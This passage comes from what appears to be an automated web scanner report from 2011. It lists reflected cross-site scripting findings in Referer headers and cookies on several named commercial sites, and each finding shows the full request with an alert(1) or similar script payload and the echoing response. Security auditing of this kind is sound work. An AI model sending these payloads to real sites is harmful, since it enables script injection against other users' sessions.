Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=48394"><script>alert(1)</script>f4c68eaa46d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:24 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=48394"><script>alert(1)</script>f4c68eaa46d" />
...[SNIP]...

2.124. http://www.whitefence.com/category/television-service/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5747"><script>alert(1)</script>f6d5090bb1c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b5747"><script>alert(1)</script>f6d5090bb1c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:26 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=b5747"><script>alert(1)</script>f6d5090bb1c" />
...[SNIP]...

2.125. http://frontier.my.yahoo.com/ [B cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The value of the B cookie is copied into an HTML comment. The payload f96d6--><script>alert(1)</script>f1539a4397b was submitted in the B cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=iif96d6--><script>alert(1)</script>f1539a4397b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=5394529394e6612406d36d0.50699106&s=dVWcpe4RkVkibBSnhXjPDQ--; expires=Mon, 05-Sep-2011 12:29:52 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:52 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171901

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...
<!--
PERF pid[62619]|user[ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=iif96d6--><script>alert(1)</script>f1539a4397b]|t[1315312192]|uri[/]|_rid[QBJmTvV6_Nib9AAADHhqbg..]|PAGE[YES]|UPES[5.8]|UPESF[5.9]|AC_upes[6.4]|AC_contentdb[10.4]|AC_ups[8.3]|coketoday_perf[17.2]|AC_coketoday[24.5]|AC_yql[3.3]|AC_weather[0.4]|coke
...[SNIP]...

2.126. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24732"-alert(1)-"bc24b459e39 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/15925-15.js?cb=0.7626287858001888&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=24732"-alert(1)-"bc24b459e39; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:46:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^71; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69236; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3162105.js^3^1315313163^1315313163&3142788.js^3^1315313162^1315313163&3147284.js^2^1315313162^1315313162&3142737.js^1^1315313161^1315313161&3172566.js^2^1315313155^1315313160&638177.js^10^1315313155^1315313155&3218925.js^1^1315313155^1315313155; expires=Tue, 13-Sep-2011 12:46:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2363

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162105"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=24732"-alert(1)-"bc24b459e39\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.127. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 565cb"-alert(1)-"ba9a296a288 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/15925-2.js?cb=0.8956789178773761&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=565cb"-alert(1)-"ba9a296a288; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^1; csi2=638178.js^1^1315313134^1315313134&3172565.js^1^1315313133^1315313133; rdk=6348/9844; rdk15=0; ses15=9844^2; csi15=638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:51:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 13:51:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^21; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=68937; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3162106.js^2^1315313462^1315313462&3142787.js^3^1315313461^1315313462&3142736.js^5^1315313454^1315313460&3147282.js^2^1315313454^1315313454&638178.js^5^1315313134^1315313454&3218923.js^1^1315313454^1315313454&3172565.js^2^1315313133^1315313454; expires=Tue, 13-Sep-2011 12:51:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2361

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162106"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=565cb"-alert(1)-"ba9a296a288\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.128. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c6b4"-alert(1)-"6a907558510 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/16043-15.js?cb=0.7354257416445762&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=9c6b4"-alert(1)-"6a907558510; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:46:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^67; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69237; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3142788.js^2^1315313162^1315313162&3147284.js^2^1315313162^1315313162&3142737.js^1^1315313161^1315313161&3172566.js^2^1315313155^1315313160&638177.js^10^1315313155^1315313155&3218925.js^1^1315313155^1315313155; expires=Tue, 13-Sep-2011 12:46:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1954

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3142788"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9c6b4"-alert(1)-"6a907558510\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.129. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e29a"-alert(1)-"49c08fab665 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/16043-2.js?cb=0.6071016045752913&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=8e29a"-alert(1)-"49c08fab665; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6348/9844; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=35; expires=Tue, 06-Sep-2011 13:46:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^43; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69234; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1691

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3201722"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=8e29a"-alert(1)-"49c08fab665\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.130. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54184"-alert(1)-"624e25b3d18 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x3068d5.js&size_id=2&account_id=6348&site_id=9844&size=728x90&cb=0.8285465578082949 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=54184"-alert(1)-"624e25b3d18; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132; rdk=6348/9844; rdk2=0; ses2=9844^1; csi2=3172565.js^1^1315313133^1315313133

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=18; expires=Tue, 06-Sep-2011 13:46:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^1ca0eaaac19d1eb65fb2a3086; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69232; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1687

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3201722"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=54184"-alert(1)-"624e25b3d18\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.131. http://utdi.reachlocal.net/index.html [RlocalUID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd63"><script>alert(1)</script>9174be4056b was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.html?scid=2323693&cid=e78be HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=e78be%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3E08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Cookie: RlocalUID=tc%3D110906050952308467fd63"><script>alert(1)</script>9174be4056b; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:10:39 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb101
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22698
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
<a href="http://rtsys.rtrk.com/coupon/?scid=2323683&cid=837045&tc=110906050952308467fd63"><script>alert(1)</script>9174be4056b&ptt=4&target_email=kheckaman@utdi.com" TARGET="RL_top">
...[SNIP]...

2.132. http://www.frontierpages.com/ [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /

Issue detail

The value of the FrontierPages cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6394a"><script>alert(1)</script>5a4e9c709b5 was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
